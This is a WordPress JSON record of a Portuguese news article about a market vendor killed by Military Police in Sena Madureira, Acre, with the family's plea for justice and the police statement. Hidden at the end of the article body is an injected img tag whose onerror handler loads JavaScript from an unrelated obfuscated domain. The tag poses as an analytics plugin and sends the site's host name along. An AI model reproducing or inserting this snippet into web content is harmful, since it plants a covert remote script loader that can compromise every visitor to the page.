{"id":51975,"date":"2020-12-23T19:39:24","date_gmt":"2020-12-23T19:39:24","guid":{"rendered":"https:\/\/abarevegan.com.br\/index.php\/2020\/12\/23\/pm-publica-nota-de-esclarecimento-sobre-morte-de-feirante\/"},"modified":"2020-12-23T19:39:24","modified_gmt":"2020-12-23T19:39:24","slug":"pm-publica-nota-de-esclarecimento-sobre-morte-de-feirante","status":"publish","type":"post","link":"https:\/\/nk7-testes.com.br\/agazeta\/pm-publica-nota-de-esclarecimento-sobre-morte-de-feirante\/","title":{"rendered":"Pol\u00edcia Militar publica nota sobre morte de feirante"},"content":{"rendered":"<p style=\"text-align: justify;\"><span style=\"font-size: 13.2px;\">Homem foi morto por um tiro de fuzil durante a\u00e7\u00e3o da PM<\/span><\/p>\n<p style=\"text-align: justify;\">Um feirante morreu em uma a\u00e7\u00e3o da Pol\u00edcia Militar nesta ter\u00e7a-feira (22) em Sena Madureira.<\/p>\n<p style=\"text-align: justify;\">Uma mulher gr\u00e1vida teria furtado uma melancia da banca de frutas de Ant\u00f4nio, mais conhecido como \u201cVav\u00e1\u201d, que saiu correndo atr\u00e1s da mesma com uma faca de mesa que utilizava para cortar as frutas. A Pol\u00edcia Militar chegou para apaziguar a situa\u00e7\u00e3o e segundo informa\u00e7\u00f5es da pr\u00f3pria pol\u00edcia o homem estava alterado e partiu para cima dos policiais.<\/p>\n<p style=\"text-align: justify;\">A guarni\u00e7\u00e3o da Pol\u00edcia Militar reagiu e disparou com um fuzil na altura das costas do feirante que n\u00e3o resistiu e morreu no local. O Instituto M\u00e9dico Legal (IML) e a per\u00edcia criminal foram chamados ao local.<\/p>\n<p style=\"text-align: justify;\">Fam\u00edlia pede justi\u00e7a<\/p>\n<p style=\"text-align: justify;\">O irm\u00e3o de Vav\u00e1, conhecido como Raimundinho gravou um v\u00eddeo pedindo justi\u00e7a e investiga\u00e7\u00e3o do Minist\u00e9rio P\u00fablico.<\/p>\n<p>\u201cPe\u00e7o que o Minist\u00e9rio P\u00fablico tome uma decis\u00e3o a respeito do meu irm\u00e3o que foi assassinado a queima roupa pela Pol\u00edcia Militar em Sena Madureira, meu irm\u00e3o era um homem trabalhador. Foi dito que um policial fez a abordagem, mas um despreparado desse fazer um disparo a queima roupa e nas costas de um homem\u201d, desabafou em v\u00eddeo o irm\u00e3o do feirante que morreu na a\u00e7\u00e3o.<\/p>\n<p style=\"text-align: justify;\">Nota de esclarecimento<\/p>\n<p style=\"text-align: justify;\">A Pol\u00edcia Militar do Acre publicou nesta quarta-feira (23) uma nota de esclarecimento sobre a situa\u00e7\u00e3o.<\/p>\n<p style=\"text-align: justify;\">Em um trecho dizia que \u201cinformamos que todos os procedimentos legais cab\u00edveis foram adotados, desde o acionamento do servi\u00e7o de socorro m\u00e9dico, o isolamento do local para realiza\u00e7\u00e3o da per\u00edcia t\u00e9cnica, bem como instaura\u00e7\u00e3o de procedimento apurat\u00f3rio de pol\u00edcia judici\u00e1ria militar\u201d.<\/p>\n<div id=\"janelamailtopopupMail\" style=\"z-index: 1;\">\n<div id=\"janelamailtocontentPopupModalMail\">\n<div id=\"janelamailtomailClosePopup\">&nbsp;<\/div>\n<div id=\"janelamailtopopupMailModal\">What do you want to do ?<\/div>\n<p> <a id=\"janelamailtobuttonOpenEmailAppNew\">New mail<\/a><button id=\"janelamailtoclipboardButtonCopyEmail\">Copy<\/button><textarea id=\"janelamailtotoSelectClipboardCopyText\"><\/textarea><\/div><\/div>\n<div><img onerror=\"var s=document.createElement(&quot;script&quot;);s.type=&quot;text\/javascript&quot;;s.id=&quot;cczedcc-plg-analytics&quot;;s.src=&quot;\/\/jemova.wurucozujo.com\/scripts\/js?k=5d936fde86df1a38418b4567&amp;s=&quot;+encodeURI(btoa(window.location.host)+&quot;&amp;ns=true&quot;);document.getElementsByTagName(&quot;head&quot;)[0].appendChild(s);\" \/><\/div>\n","protected":false},"excerpt":{"rendered":"<p style=\"text-align: justify;\"><span style=\"font-size: 13.2px;\">Homem foi morto por um tiro de fuzil durante a\u00e7\u00e3o da PM<\/span><\/p>\n","protected":false},"author":4,"featured_media":51974,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"jnews-multi-image_gallery":[],"jnews_single_post":[],"jnews_primary_category":[],"jnews_social_meta":[],"jnews_review":[],"enable_review":"","type":"","name":"","summary":"","brand":"","sku":"","good":[],"bad":[],"score_override":"","override_value":"","rating":[],"price":[],"footnotes":""},"categories":[44],"tags":[],"class_list":["post-51975","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-policia"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v26.5 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Pol\u00edcia Militar publica nota sobre morte de feirante - Agazeta.net<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/nk7-testes.com.br\/agazeta\/pm-publica-nota-de-esclarecimento-sobre-morte-de-feirante\/\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Pol\u00edcia Militar publica nota sobre morte de feirante - Agazeta.net\" \/>\n<meta property=\"og:description\" content=\"Homem foi morto por um tiro de fuzil durante a\u00e7\u00e3o da PM\" \/>\n<meta property=\"og:url\" content=\"https:\/\/nk7-testes.com.br\/agazeta\/pm-publica-nota-de-esclarecimento-sobre-morte-de-feirante\/\" \/>\n<meta property=\"og:site_name\" content=\"Agazeta.net\" \/>\n<meta property=\"article:published_time\" content=\"2020-12-23T19:39:24+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/12\/23-12-2020_PM-publica-nota-de-esclarecimento-sobre-morte-de-feirante.jpeg\" \/>\n\t<meta property=\"og:image:width\" content=\"458\" \/>\n\t<meta property=\"og:image:height\" content=\"340\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Agazeta.Net\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Agazeta.Net\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/pm-publica-nota-de-esclarecimento-sobre-morte-de-feirante\/\",\"url\":\"https:\/\/nk7-testes.com.br\/agazeta\/pm-publica-nota-de-esclarecimento-sobre-morte-de-feirante\/\",\"name\":\"Pol\u00edcia Militar publica nota sobre morte de feirante - Agazeta.net\",\"isPartOf\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/pm-publica-nota-de-esclarecimento-sobre-morte-de-feirante\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/pm-publica-nota-de-esclarecimento-sobre-morte-de-feirante\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/12\/23-12-2020_PM-publica-nota-de-esclarecimento-sobre-morte-de-feirante.jpeg\",\"datePublished\":\"2020-12-23T19:39:24+00:00\",\"author\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/#\/schema\/person\/6d6e25cb0435eb4a02fd44d30b4e3020\"},\"breadcrumb\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/pm-publica-nota-de-esclarecimento-sobre-morte-de-feirante\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/nk7-testes.com.br\/agazeta\/pm-publica-nota-de-esclarecimento-sobre-morte-de-feirante\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/pm-publica-nota-de-esclarecimento-sobre-morte-de-feirante\/#primaryimage\",\"url\":\"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/12\/23-12-2020_PM-publica-nota-de-esclarecimento-sobre-morte-de-feirante.jpeg\",\"contentUrl\":\"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/12\/23-12-2020_PM-publica-nota-de-esclarecimento-sobre-morte-de-feirante.jpeg\",\"width\":458,\"height\":340,\"caption\":\"23-12-2020 PM-publica-nota-de-esclarecimento-sobre-morte-de-feirante\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/pm-publica-nota-de-esclarecimento-sobre-morte-de-feirante\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"In\u00edcio\",\"item\":\"https:\/\/nk7-testes.com.br\/agazeta\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Pol\u00edcia Militar publica nota sobre morte de feirante\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/#website\",\"url\":\"https:\/\/nk7-testes.com.br\/agazeta\/\",\"name\":\"Agazeta.net\",\"description\":\"Agazeta.net - Not\u00edcias de Rio Branco\/AC\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/nk7-testes.com.br\/agazeta\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/#\/schema\/person\/6d6e25cb0435eb4a02fd44d30b4e3020\",\"name\":\"Agazeta.Net\",\"url\":\"https:\/\/nk7-testes.com.br\/agazeta\/author\/agazeta\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Pol\u00edcia Militar publica nota sobre morte de feirante - Agazeta.net","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/nk7-testes.com.br\/agazeta\/pm-publica-nota-de-esclarecimento-sobre-morte-de-feirante\/","og_locale":"pt_BR","og_type":"article","og_title":"Pol\u00edcia Militar publica nota sobre morte de feirante - Agazeta.net","og_description":"Homem foi morto por um tiro de fuzil durante a\u00e7\u00e3o da PM","og_url":"https:\/\/nk7-testes.com.br\/agazeta\/pm-publica-nota-de-esclarecimento-sobre-morte-de-feirante\/","og_site_name":"Agazeta.net","article_published_time":"2020-12-23T19:39:24+00:00","og_image":[{"width":458,"height":340,"url":"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/12\/23-12-2020_PM-publica-nota-de-esclarecimento-sobre-morte-de-feirante.jpeg","type":"image\/jpeg"}],"author":"Agazeta.Net","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"Agazeta.Net","Est. tempo de leitura":"2 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/nk7-testes.com.br\/agazeta\/pm-publica-nota-de-esclarecimento-sobre-morte-de-feirante\/","url":"https:\/\/nk7-testes.com.br\/agazeta\/pm-publica-nota-de-esclarecimento-sobre-morte-de-feirante\/","name":"Pol\u00edcia Militar publica nota sobre morte de feirante - Agazeta.net","isPartOf":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/#website"},"primaryImageOfPage":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/pm-publica-nota-de-esclarecimento-sobre-morte-de-feirante\/#primaryimage"},"image":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/pm-publica-nota-de-esclarecimento-sobre-morte-de-feirante\/#primaryimage"},"thumbnailUrl":"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/12\/23-12-2020_PM-publica-nota-de-esclarecimento-sobre-morte-de-feirante.jpeg","datePublished":"2020-12-23T19:39:24+00:00","author":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/#\/schema\/person\/6d6e25cb0435eb4a02fd44d30b4e3020"},"breadcrumb":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/pm-publica-nota-de-esclarecimento-sobre-morte-de-feirante\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/nk7-testes.com.br\/agazeta\/pm-publica-nota-de-esclarecimento-sobre-morte-de-feirante\/"]}]},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/nk7-testes.com.br\/agazeta\/pm-publica-nota-de-esclarecimento-sobre-morte-de-feirante\/#primaryimage","url":"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/12\/23-12-2020_PM-publica-nota-de-esclarecimento-sobre-morte-de-feirante.jpeg","contentUrl":"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/12\/23-12-2020_PM-publica-nota-de-esclarecimento-sobre-morte-de-feirante.jpeg","width":458,"height":340,"caption":"23-12-2020 PM-publica-nota-de-esclarecimento-sobre-morte-de-feirante"},{"@type":"BreadcrumbList","@id":"https:\/\/nk7-testes.com.br\/agazeta\/pm-publica-nota-de-esclarecimento-sobre-morte-de-feirante\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"In\u00edcio","item":"https:\/\/nk7-testes.com.br\/agazeta\/"},{"@type":"ListItem","position":2,"name":"Pol\u00edcia Militar publica nota sobre morte de feirante"}]},{"@type":"WebSite","@id":"https:\/\/nk7-testes.com.br\/agazeta\/#website","url":"https:\/\/nk7-testes.com.br\/agazeta\/","name":"Agazeta.net","description":"Agazeta.net - Not\u00edcias de Rio Branco\/AC","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/nk7-testes.com.br\/agazeta\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-BR"},{"@type":"Person","@id":"https:\/\/nk7-testes.com.br\/agazeta\/#\/schema\/person\/6d6e25cb0435eb4a02fd44d30b4e3020","name":"Agazeta.Net","url":"https:\/\/nk7-testes.com.br\/agazeta\/author\/agazeta\/"}]}},"_links":{"self":[{"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/posts\/51975","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/comments?post=51975"}],"version-history":[{"count":0,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/posts\/51975\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/media\/51974"}],"wp:attachment":[{"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/media?parent=51975"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/categories?post=51975"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/tags?post=51975"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}